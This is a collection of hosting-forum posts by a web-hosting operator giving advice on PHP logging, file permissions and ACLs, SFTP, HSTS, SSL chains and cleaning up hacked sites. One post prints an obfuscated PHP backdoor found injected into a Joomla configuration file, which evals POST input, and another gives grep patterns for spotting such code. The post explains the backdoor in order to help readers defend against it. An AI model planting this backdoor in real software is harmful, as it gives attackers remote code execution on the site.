nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

tj9991 posted:

After five months of hosting with Apis Networks I have cancelled and moved to Linode. I do not recommend Apis Networks for anyone planning on using PHP.

I experienced issues getting PHP to report errors rather than serve a blank page. Referencing multiple PHP and .htaccess methods of turning on this feature, I never fully resolved the issue. The tech support I received was mediocre. Following their instructions exactly did not solve the issue.

Frustrated, I looked for a new host. I have known of Linode for some time, but the prices were too steep for small projects. Deciding to give it a try, I set up a node with Nginx, PHP FastCGI and MySQL. Having root access is a breath of fresh air after using shared hosts for years. I doubt I will be leaving Linode any time soon, unless a competitor can provide better specs for the price.

Side note: pages are loading 5-10x faster on Linode than on Apis Networks. The Linode data center in CA may be much closer than Apis Networks (I reside in WA) but I doubt it would make such an impact.

I handled your issue. The problem was two-fold. First, you designated a separate file to log errors outside the default, which merges Apache and PHP errors into /var/log/httpd/error_log. Ownership of that log file precluded the HTTP server from writing to it, and the permissions still hadn't been changed when I examined your setup further. Second, the error reporting level configured via .htaccess was downgraded to something that excluded the E_WARNING and E_NOTICE types (9999 or so if memory serves me correctly), so only fatal errors would have been logged even if the permissions were corrected. The PHP documentation recommends using 2147483647 as your error_reporting value in an .htaccess directive.
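For anyone else hitting this, a minimal .htaccess sketch (mod_php assumed; the log path is just an example and has to be writable by the web server user):
code:
php_value error_reporting 2147483647
php_flag  display_errors Off
php_flag  log_errors On
php_value error_log /home/youruser/logs/php_errors.log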

Odd you had such a speed discrepancy. If you still want to troubleshoot speed issues, send me a PM or e-mail with your IP and a traceroute to 64.22.68.16, which is based in Atlanta. The 5-10x figure may be a gross exaggeration, since server loads are minor, around 0.25-0.5 on Helios around the clock.

edit: E_NOTICE/E_WARNING

nem fucked around with this message at 01:21 on Feb 21, 2013


nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

LordMaxxie posted:

If you have cPanel, I believe you can get a McAfee's PCI scan (every 3 months) for free. Couple that with the self assessment questionnaire and you're right to go.
As for when the scan finds vulnerabilities, you'll need to fix them of course. This is where you need a system admin, if you can't do it yourself.
A few names come to mind such as Rack911, AdminGeekz or rackAID. It will set you back though.

If you don't have cPanel, PCI scanning will be costly. I think Trustwave was the cheapest when I was looking, it comes with an SSL as well.

Apart from that, there's web hosts which combine all of the above for an additional fee with their hosting services.


But as above, a merchant service can store the card info for you. Nothing is infallible.

I'd caution against Trustwave, having been on the administrative end of their scanning. Most PCI scanners load up Nessus or another variant with rulesets too crude to account for backports from Red Hat Enterprise Linux/CentOS. Trustwave, for example, will scan the major/minor version of OpenSSH and ignore the patch levels that RHEL backports to fix a CVE. I've had clients escalate verified CVE patches from Red Hat to Trustwave without success.

Additionally, I've used SecurityMetrics for PCI scanning, which was bundled with FirstData at the time. Very similar results: CVEs that could not actually be exploited in the given environment were deemed "vulnerable" based on the pattern match and had to be whitelisted. FirstData cannibalized that partnership and set up Rapid Comply. Six months and 2 scans in, so far so good; there haven't been any false positives.

Unless you know your environment inside-out and have strict policies in place to safeguard credit card data, use a third-party to handle credit cards. FirstData provides recurring billing through their system, and they've been fantastic since placing them in a bidding war with Elavon for merchant accounts a couple years back.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

DarkLotus posted:

Serious question... If a hosting provider does not offer phone support, is that a deal breaker for you? Why?
I mean, what do you really need to get on the phone for if the support tickets are answered promptly and live chat and instant messenger are readily available.

I'll opine from the opposite side of the fence:

Phone is an enormous time sink compared to e-mail. I'll handle 2-3 tasks concurrently ~40% of the time every day. If I have a window open for issues, e-mail is active in the background. If I need to handle a major issue, the phone goes silent and e-mail is suspended. You can easily interleave multiple tasks while you're waiting on a response from someone or waiting for a task to finish, whereas phone is an attentive waiting game: the client types in a password, then realizes only after submitting that it was mistyped, or pedantically spells out a URL letter by letter.

Phone is kept for emergency situations only, but even then if there is an emergency (DoS for example), phone goes on silent and other forms of communication are used to address en masse, particularly Twitter.

I always enjoy the question of, "well, when do you expect it to get fixed?" to which the only genuine answer is, "the time it would have normally taken plus the time spent on the phone explaining this to you."

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Arboc posted:

If addr.com is just your DNS host (and not the registrar) then you probably don't need to transfer the whole domain to a new registrar, and you shouldn't be at risk of losing control of the domain itself. You'll still probably have to find a new host, and you may have to work around issues trying to migrate the individual pieces; I've seen some smaller all-in-one web companies that make things needlessly difficult when you try to take matters into your own hands.

Valid point. Can we update the OP to include a list of hosting providers that make routine tasks needlessly difficult? EPP-restricted registrar transfers, non-existent DNS administration, inaccessible file retrieval, etc. Basically a blacklist of shoddy support to help others steer clear of these situations, because we're here to help people not go down the same path... and over the years the record is starting to add up.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

fletcher posted:

I've had a dedicated server through Future Hosting for years in their Chicago DC and it's been great. Up until recently that is, when my download speed will slow to a 32KB/s crawl for hours on end. During the slowness I can speedtest my connection and get 3MB/s. I was also able to download a test file on the server from an AWS machine and it hit 10MB/s. So both me and the server have plenty of bandwidth to spare, is it just my routing that is hosed or something? Too many people around here watching Netflix?

Does it happen continuously during set intervals, or sporadically? If it's at set intervals, it's network congestion somewhere along the path between your connection and the data center (most likely at the data center end). You could use something like webpagetest.org with a simple page stuffed with data to ascertain download speeds from other places across the globe - or - just do a traceroute (mtr/winmtr) and look for congestion via high pings.
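If you want to gather that yourself first, something along these lines works (the hostname is a placeholder for your server):
code:
# 100 probes in report mode; look for a hop where loss or latency jumps and stays high
mtr -rwc 100 your-server-hostname.example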

If sporadically, it's probably a Broadcom NIC :argh:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

fletcher posted:

It sounded pretty conclusive. I've been able to reproduce the slowness from a completely different locations in California now. They asked for the mtr report and I provided it, and they said there's no indication the issue is with something they control.


What causes that anyways? And for the reverse path, that's just running mtr from the server to me right?


At any rate, Future Hosting offered to make an exception and give me a server in their Santa Clara data center (with double the disk and ram) so I'm gonna take them up on it. Hopefully that will resolve my issue!

Yes, it's just a mtr from the server to your IP. Dropped ping replies are caused by network policies that throttle or filter echo replies out entirely. There could be QoS implemented somewhere upstream in the network. That would be evident in your reduced bandwidth throughput during peak hours, but not necessarily ping times.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

cstine posted:

During my "career" doing random IT contracting stuff, that was almost EVERYONE I dealt with.

It was a cost, so don't spend any money. Your website making you $50,000 a month in sales? Can't afford a $129 a month dedicated box to fix the performance problems your poo poo VPS has!

Except then your poo poo VPS dies, and WHY DIDN'T YOU FIX THIS becomes the new mantra.

The hosting gig seems to be a little better - we don't do VMs in any form, at all. So we've already weeded out the super-cheap types, and generally the customers that are left don't throw a giant fit where it's all about the cost, and nothing else matters.

I think there's an idiom to express this fallacy...

Yes: penny wise and pound foolish.

Kiva, several years ago, hosted their non-profit charity through Dreamhost. After a couple of months, once the charity took off, it seemed prudent to the owners to remain with Dreamhost, remitting $6/mo in hosting fees while bringing in $10k in charitable contributions. Then growth accelerated and service slowed as Dreamhost packed more clients onto the server, until a move seemed onerous. Rather than jumping to a dedicated server for $100/mo at the time, the owners decided the salient move was to complain on the forums about the subpar service. It fell upon deaf ears.

Decision-makers need to decide what is right. Cutting corners, cutting costs, and zapping a lifeline to your business proves nothing more than impracticality and a reluctance to believe in the idea. I'm not for dropping $300/mo on a concept; in fact, I spent a couple of years as a sole proprietorship. I am, however, advocating that people not be stupid in evaluating their future plans. Look at short-term growth. If your growth is climbing, then anticipate a positive trajectory. If your growth has stagnated or, worse, plateaued, then evaluate a graceful departure. Don't flip-flop these strategies by building crap for growth and growth for crap.

It takes just a little bit of sensibility, and that's the problem I've seen time and time again within the hosting industry. :corsair:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

onionradish posted:

I just switched a client from a crappily-managed Rackspace reseller account to Bluehost. During the time gap between DNS switchover, some emails went to the old server. I'd like to get access to those emails through webmail or something before we decomission the old servers.

The old reseller is claiming no ability to access those emails since they're "only accessible" by web/mail.hostname.com (which has since been transferred to a new host), but has proven himself to be a lazy gently caress whose answer over the last several months has always been "can't help ya" regardless of the context, so I don't trust him.

Are we really not able to access mail stored on the previous server, even through webmail, or is my mistrust of the previous host justified?

Mistrust is justified. Most mail is stored as Maildir, so it's a matter of copying the single-file messages over as-is to the new server.

If you have your old IP address handy, edit your hosts file and add an entry pointing mail.hostname.com to the old IP address. You will then be able to pull up webmail on your old host. But then again, it's just slovenly mismanagement by your old reseller; they can provide you with the messages should they choose to do so.
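A sketch of what that hosts entry looks like (the IP here is made up; use your old server's):
code:
# /etc/hosts on Linux/OS X, C:\Windows\System32\drivers\etc\hosts on Windows
203.0.113.10   mail.hostname.com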

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Rufus Ping posted:

Paradoxically the most professional and lowest-bullshit registrar I've been with is also one of the cheapest, internet.bs. This may be because both qualities are valued by their original customer base, professional domainers with large portfolios.

Never bite the hand that feeds.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

Looking for some help. My employer's website was defaced. We use Hostgator currently. It seems like they've been compromised because I created a support ticket a week ago and when I called them for an update, they said that they have hundreds of support tickets and I'm rather far back in the queue. They then referred me to a couple of website antivirus / firewall providers.

I was told not to do anything until Hostgator support could take a look, but they said it could take over a month for them to get to us. We currently have 1 domain and 5 subdomains, a shop using Cubecart, and email addresses using Google Apps but are looking to expand on the number of domains and websites we have.

I think the best course of action for us would be to upload a backup (I need to check if we have one) to a different web host, update the DNS, and change all passwords.

Is this a good course of action? Also, are there any recommended web hosts? I was looking at Lithium Hosting in the OP and the prices seem pretty good.

Once defaced, the rest of your files aren't secure either, since on those setups every single file (web assets, maybe e-mail) on your account has the same access rights as the file that was initially defaced. Hackers today will inject code into files that can only be triggered with the right combination of query parameters, so unless you pass along the right GET request, it'll appear safe. Nuke your Cubecart assets or check for files modified within the last week (find from the shell works: find . -mtime -7 -print ). Go through anything modified in that window carefully, looking for arbitrary code that doesn't belong. If it's there, assume your other files have been compromised too as a consequence of running everything under a single user.
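As a sketch, something like this from your docroot (the grep patterns cover only the usual obfuscation suspects, not everything):
code:
# anything touched in the last 7 days
find . -type f -mtime -7 -print
# quick sweep of recently-modified PHP for the usual primitives
find . -type f -name '*.php' -mtime -7 -exec grep -l 'base64_decode\|eval(' {} +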

Once your account is defaced, and you run php-fpm or php-cgi under the same user as your account (big box hosters do this for resource accountability), assume all files have an equal chance of being tainted with malicious bootloader code or viewed by a third-party.

Also, good opportunity to update Cubecart, since there are some vulnerabilities in the wild.

Sorry about missing your live chat request earlier. Had to head up to North Atlanta this afternoon for a funeral I had just found out about last night. :corsair:

Edit: thought about this a little more tonight to draw a parallel: consider having 2 keys. One key is a skeleton key that opens every door in your house. The other opens just the basement stuffed full of junk. An intruder grabs hold of your basement key - not an issue; you accept it may get broken into eventually. An intruder grabs hold of your skeleton key - problem, insofar as he now has access to every room in your house and every valuable good and piece of information in it.

It's the same issue when you run WordPress/Drupal/Joomla! under the same user that owns your personal files and other web assets. On Hostgator and EIG's sibling brands, that's exactly what happens: only one user exists, and it's shared between your web files and your personal files. You have one key and it is a master key. If that's compromised, you're in a world of hurt, because now they have access to your e-mail (if stored on the same server), your SSH keys, and, depending upon partitioning, likely other domains' content as well.

So please be mindful. Hacking isn't a rudimentary point-and-click WinNuke like a decade ago (nor are DoS attacks). With time comes dissemination of knowledge and hackers too build better tools to carry out more sophisticated, undetectable attacks. I've seen it in post-mortem analyses of hacked accounts that were time and time again a victim of outdated software. Whenever there is a breach, there is curiosity too of what else lurks on your site. Had something sensitive nestled among your files? Now you have a big problem on your hands.

TLDR: flatten and reinstall if you're unsure of the scope of damage

nem fucked around with this message at 05:42 on Jan 16, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

Sucuri is much cheaper at $99 per year, but realistically we would drop them after they have fixed the problem to a satisfactory degree.

This is why security relapses occur. If you've proven, up along the managerial chain, unable to keep a site secure, what realistically makes you think this won't happen again?

Thalagyrt posted:

If you have the capability (you most likely don't on shared hosting) you should set up your web worker as a completely separate user from the user that actually owns your web directory. Doing so would entirely eliminate a lot of the big pain point you're seeing and make a web application firewall mostly unnecessary (it still could save you from some things)... It might be possible with nem's kick-rear end custom panel, but I can't speak to that directly as I don't know much about what he's built over there.

Yes, this is the correct approach, and yep that's what we've done for a long time.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

We're an extremely small nonprofit organization full of old people with no IT department and historically something bad has had to happen to us in order for our board of directors to care about it enough to act.

I can make recommendations to move to a web host that is more secure than Hostgator and overall implement better practices but unfortunately it'll take some convincing to add more monthly / annual fees to the operating budget.

I know it's extremely shortsighted, but it's the situation I'm in and it's really frustrating.

Vote the least useful director off your board and accommodate a $99/year budgetary increase. Your reputation and reliability are more important, and more costly, than $8/mo. If your organization has issues accommodating an $8/mo increase, then there is some administrative fat or misconduct within the organization that goes beyond this thread.

Sites have 4 attack vectors, ordered from most to least likely: (1) compromised user accounts, typically penetrated through unsafe browsing habits and a lack of AV software, (2) the software powering your web site, (3) the server software itself, (4) serendipity. 1 and 2 are interchangeable depending upon how well you keep on top of things. Make it a habit to check the vendor's web site once a month, maybe on the first, to see if there's a new version available. Incremental upgrades are always easier than the major upgrade you're forced into after getting hacked.

Based upon your information, I don't believe HG is exclusively to blame. You might do well with a VPS. You might do well with shared hosting from any recommended brand on the first page. But you might also relapse, and continue to do so in perpetuity, until your organization gets its head out of its rear end and takes accountability more seriously.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.

Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop:

php:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].
     $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].
     $sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n88b749'])) { 
eval($s21(${$s20}['n88b749']));}?><?php
class JConfig {
    public $offline = '0';
    public $offline_message = 'This site is down for ma
So you've got a Joomla! configuration, along with obfuscated code. Most of this is automated now: scramble some chars, create a function out of it to bypass simple mod_security detection, and when you have the right key base64 decode + eval the command, letting all hell break loose. It's slipped into the affected file. So long as $_POST['n88b749'] isn't set, the page appears "safe".

Typically it's one line, but I had to break it into a few lines to make it play nice with the forums.

The only reason this happened is that the file's permissions allowed the web server user to alter it (the client got lazy and applied 777 to all files). If the file had permissions 755 and a different owner than the user the web server runs as, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user that owns the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this one), there's no guarantee your frontend software is safe.
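Cleaning that up on a box where the web server runs as its own user is quick (the user and group names here are placeholders):
code:
chown someuser:someuser configuration.php
chmod 644 configuration.php    # owner read/write; the web server, running as a different uid, can only read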

:words:

nem fucked around with this message at 09:51 on Jan 19, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

McGlockenshire posted:

Sooooooo, CGI is the problem instead of 0777 permissions?

Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account.

So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.

No, the issue is any system in which the web server or process lifecycle operates under the same user that has access to the rest of that user's files. CGI/FCGI/FPM, whatever wrapper you're using that switches users to process a request, is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777; only the scope of the damage changes (all of your files vs. all of someone else's).

777 is bad because members of your group can run amok and modify any of your files. 717 works if you keep one user, the web server, outside the group as "other", because then nobody besides the web server matches "other" and can touch your assets.

Sometimes 777 doesn't work because it's a mixed environment with other users. In those cases, you should run the web server as a separate user and grant write permissions through ACLs on those files which the web server must write or modify, e.g.:
code:
user::rwx
user:apache:---
group::r-x
mask::r-x
other::r-x
File still appears as 755, but with an additional security set.
code:
# sudo -u apache /bin/cat
sudo: unable to execute /bin/cat: Permission denied
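For reference, a sketch of the commands that produce an ACL like that (the user name and file names are examples):
code:
# web server (user "apache" here) gets no access at all to a sensitive file
setfacl -m u:apache:--- config.php
getfacl config.php             # verify the entries
# where it genuinely must write, grant it explicitly
setfacl -R -m u:apache:rwX uploads/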
For example, when setting up WordPress the best things you can do from a security standpoint are:
  • run the web server under a different uid
  • use manual update mode, plug in your FTP password
  • use setfacl to permit write access by the web server to wp-content/uploads/
  • remove handler support for script/PHP files under wp-content/uploads/ (see the sketch below)
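On that last point, a sketch of what it can look like in an .htaccess dropped into wp-content/uploads/ (Apache 2.2 syntax assumed; on 2.4 it's "Require all denied", and nginx/php-fpm setups need the equivalent in the server config):
code:
# wp-content/uploads/.htaccess - nothing in here should ever execute as PHP
<FilesMatch "\.(php|phtml|php[0-9])$">
    Order allow,deny
    Deny from all
</FilesMatch>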

It's not perfect, but it's pretty close to being so.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

DarkLotus posted:

On a multi-user system, you probably don't want to make something world-writeable if you're already concerned about it being group-writeable.

Depends upon the setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, 717 works. The 1 applies to the group and the 7 to "other", which under discretionary access control catches anyone not matched by owner or group. It's a dumbed-down version; ACLs or SELinux are better, albeit more involved, options.

Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement.

\/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above.

nem fucked around with this message at 01:50 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

eightysixed posted:

I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.

Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server, and the traffic will pass out onto the network, liable to be sniffed. If the FTP server resides on the same machine as WordPress, use localhost: traffic won't leave the server unless the machine is compromised and a privileged user is capturing local traffic, in which case you've got bigger issues on your hands (a possible rooting). The FTP password then passes over a TCP socket connected locally on the server, bypassing the switch.

SFTP requires ssh as a wrapper, so there's a dependency upon the host supporting ssh on the account. I hope that in time WordPress will integrate AUTH TLS support into its built-in FTP client; that solves the issue of encrypting the endpoint without relying on ssh.

If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials.

Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows :downs:

edit: nuances

nem fucked around with this message at 19:54 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.

Thalagyrt posted:

SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.

It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like:

code:
root      \_ sshd: sshuser [priv]
sshuser     \_ sshd: sshuser
sshuser        \_ /usr/libexec/openssh/sftp-server
Looking at big box providers like HostGator, it's not provided on shared hosting, and I couldn't imagine it being an option without them explicitly enabling ssh. I assume there are some pure SFTP server implementations out there that don't rely on ssh as a wrapper, but I'm working off what I know and what I encounter in my field :) Auth TLS has a better adoption chance, because it's an extension of common FTP servers like vsftpd, pureftpd, and whatever else is in use.
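For the curious, the tie-in is a single line in sshd_config (the binary path varies by distro); jailing a user to SFTP-only takes a few more lines (the user name below is a placeholder):
code:
Subsystem sftp /usr/libexec/openssh/sftp-server
# or, to give someone SFTP with no shell:
Match User someuser
    ForceCommand internal-sftp
    ChrootDirectory /home/someuser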

nem fucked around with this message at 18:55 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

I was specifically addressing this:


which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.

:doh: need coffee

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Rufus Ping posted:

you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting

Yes, raw traffic capture capability is the broader and more apt term. The original post has been amended.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

same thing with persisting sessions across http to https: if you land on http, redirect to https for login, your page is ALREADY insecure, and there is no point in doing so.

HSTS fixes that, but there are always laggards in adoption (IE gets it in 11). Even a redirect via mod_rewrite to https would leak cookies and other sensitive data in the request if the https request flops back to http. So, judging by how long IE6 took to die off, we're probably 10+ years from HSTS being fully implemented across most web users' browsers. :classiclol:

Additionally, you can set cookies as secure. If a request goes from https to http, and a cookie is marked as secure, it won't get transmitted in the request. Request URI will still leak in that case.
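For anyone wiring this up, a rough sketch of the Apache side (standard mod_rewrite/mod_headers directives; the max-age is just an illustrative year):
code:
# force https, then tell the browser never to try plain http again
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"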

edit: coulda/woulda/shoulda

nem fucked around with this message at 17:35 on Jan 30, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

cstine posted:

TimThumb.php.

It's like herpes. It's everywhere, you can't get rid of it, and it'll cause endless problems!

Oh, and it's EOL so no more patches and it's STILL in zillions of themes and plugins.

And I'm not sure WHY you need it. Wordpress has the functionality built in.

... and it still insisted on using the "DOCUMENT_ROOT" server variable when storing thumbs. If you used mod_rewrite to serve content from another location, it ignored WordPress altogether and required custom patches.

:suicide:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

BlackMK4 posted:

Eh, figured out I don't have to install it. Just use the binary compiled with make. Thanks :)

--prefix=/usr/local is standard practice. Although, it depends on your medium. For the KB, which is built on WordPress, I've relied on Jetpack, which works well at discriminating bots from humans. Webalizer, Analog, and AWStats (the big free 3) have been rather dormant for some time, ceding ground to bigger commercial players in the market, chiefly Google Analytics and other value-added services that bundle analytics.

I'd just stick Google Analytics into your site and go from there. You'll get a better resolution of visitor traffic than Webalizer/Analog/AWStats, which provide only baseline traffic, i.e. how many spam bots have pulverized your site in the last 24 hours.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
Oopsie doodle...



Press release

Edit: better quality discussion of folks still silly enough to use them via WHT

nem fucked around with this message at 04:46 on Apr 1, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Anaxite posted:

Except Chrome for Android, which gives the error "NET::ERR_CERT_AUTHORITY_INVALID".

On top of that, my phone is the one Android device that doesn't have that problem. I feel like I'm stepping into black magic territory and I'm not even sure what tools I could use to research this.

Is there a possibility the root certificates installed on that Android are out of date? What Android version is the phone running?

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Anaxite posted:

I tested this on Android 4.2.2 and 5.1.1, Chrome versions 43 and 44 beta.

The only time I've seen that happen is when the intermediate certificate isn't present in the handshake, i.e. in Apache, SSLCertificateChainFile is missing or supplies an erroneous certificate. You can send as many certificates as necessary; the client will only use those applicable to resolving the chain. At least one path must be sent by the server (i.e. not require an additional download) resolving up to a certificate trusted in the client's store, and that store would be the root certificates in the phone's OS.

So either the chain isn't sent or the CA (gandi) isn't trusted in the root certificates that ship with both OSes (unlikely).
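A sketch of the relevant Apache bits (the file paths here are made up; on 2.4.8+ you can instead append the intermediates to SSLCertificateFile):
code:
SSLEngine on
SSLCertificateFile      /etc/pki/tls/certs/example.com.crt
SSLCertificateKeyFile   /etc/pki/tls/private/example.com.key
SSLCertificateChainFile /etc/pki/tls/certs/intermediate-bundle.crt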

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

reddit liker posted:

code:
reverie@apollo ~ $ wc -l /etc/nginx/nginx.conf 
294 /etc/nginx/nginx.conf
i would hate to have to write this loving config all over again

setting up hsts, ocsp stapling and spdy was a bit of a bitch, plus all of the performance poo poo

Install etckeeper and push your repo to a private repo on github or another server.
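Roughly, assuming the git backend and a placeholder remote URL:
code:
cd /etc
sudo etckeeper init                                # puts /etc under version control
sudo etckeeper commit "baseline nginx/ssl config"
sudo git remote add origin git@github.com:you/etc-backup.git
sudo git push -u origin master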

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

this is still the personal favourite ive gotten from a hosting provider



Just got one from 1and1 regarding some undocumented blacklist heuristics they implement (or a faulty network on their end):

quote:

Thank you for contacting us.

Sincerely do apologize for the inconvenience. See details below.

~$ host 64.22.68.2
2.68.22.64.in-addr.arpa domain name pointer image.apisnetworks.com.

~$ host image.apisnetworks.com
image.apisnetworks.com has address 64.22.68.2

~$ host 2.68.22.64
Host 64.22.68.2.in-addr.arpa. not found: 3(NXDOMAIN)

2.68.22.64 shoud be pointed back to 64.22.68.2, however, it resulted to not found.

If you have any further questions, do not hesitate to contact us.

When your hiring manager consists of a pigeon with a keyboard :psyboom:

Edit: and the cycle continues :smithicide:

nem fucked around with this message at 00:38 on Sep 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

hayden. posted:

I use DigitalOcean. I recently tried to SSH into my server that I hadn't SSH'd into in a long time. The private key I have has definitely not changed, but I get a "Server refused our key" error. Root password doesn't work and I'm not sure there was one originally (just the key). I tried resetting the password using DO's control panel and it didn't work. Trying to login using the console on DO's website has me log in as root, change the password, then immediatly kicks me out to login again. Logging in with the new password works for a split second but then kicks me back to login. I have no idea what I configured here.

Am I hosed? Is there something obvious I should try? Is it time to waste hours of my life figuring out how to use the recovery mode that DO provides?

I opened a support ticket and they just said to use the recovery mode.

Did you foul up one of the PAM modules? Or did you get hacked, and the hacker, being a douche, added "exit" to your .bash_profile?

I'd try booting up into single-user mode, then logging in from whatever tty terminal DO provides.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

hayden. posted:

If I had to guess, at some point in time I was following some tutorial that recommended disabling the ability to log in as root.

Booting into single user mode doesn't seem like an option. The only way to do so would be to do a power cycle and open the console viewer to try to intercept some sort of bootup screen with a keystroke, but none shows that I can see.

I loaded the recovery kernel except the space bar doesn't seem to work in it. Can't even run fsck because I can't add a space to have a '-p'. This sucks.

Pass "single" to your initrd to force single-user mode, if you've got the ability to edit your boot options. I'm not terribly familiar with DO's interface. On Linode at least you can toggle single-user bootup in the VM config.

Next time don't follow what someone else has written without comprehending its implications :science:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

Hell, $5.95/mo is basically the same price as a small VPS, which would give you a lot more control.

And a lot more responsibility to keep the machine secure, and the two often don't go hand-in-hand.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
WordPress will handle minor updates automatically. And there's a plugin to coalesce major updates into this automatic update process.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

The catch to that is that you have to give WordPress write access to itself, which is a patently bad idea if you care at all about not getting owned.

Would you rather take 1 fist or 2 fists up the rear end? Neither solution is optimal; pick the best worst solution. At least in this setup you can be proactive, rather than reactive. More importantly, you have less to think about, which is the OP's goal.

Alternatively, a separate user apart from the web server can own the files, with that user's FTP credentials stored in wp-config.php for automatic FTP updates. Your tradeoff is that the FTP login info is sitting in wp-config.php, which again can lead to getting owned... Then again, if a hacker has access to one ingress, backdoor installation is so drat trivial.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

Nah, I'd rather give WordPress no write access other than wp-content/uploads, and explicitly disable PHP execution in wp-content/uploads. Upgrade it manually, either by relaxing permissions temporarily (if you're lazy) or ideally by pushing out an entirely new codebase as a new atomic release using something like capistrano + git, symlinking content directories in from a common shared folder. The benefit of that, of course, being that your git repo instead of web server is authoritative for what code belongs on your web server.

As soon as your application has write access to its own codebase through any means you're completely done for. Doesn't take much netsec/ops experience to know that...

A hole elsewhere in its codebase will still allow arbitrary execution regardless of whether uploads/ or themes/ are satisfactorily locked down. You might halt its spread, but compromised accounts or a newfound spam relay are just as obnoxious as a security relapse. The only practical solution is vigilance. Always be on top of updates. You can make the exposed surface smaller, but a hole is a hole and in 13 years I can only attest to one thing: end-users are a mixed bag of ability. Never assume too much.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Bob Morales posted:

How many big ugly security breaches is that for them? Ugh.

Are the DDoS's still going on?

It hit Zayo's data center in Atlanta. We were affected, as was the entire data center, including its in-house brand NetDepot. The attackers hit the edge router instead of the actual machine they wanted to knock offline. Around 2 hours of intermittent downtime on New Year's Day :confuoot:.

Sometimes you feel bad for the network engineers who mitigate these onslaughts.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
/\ - What he said. Got caught up in a ticket :shobon:

Thalagyrt posted:

That's not propagation - that's cache expiration. The two are very different concepts. Propagation implies that the source is pushing data to consumers, whereas the reality is that the consumers are pulling data from the source upon request and caching it.

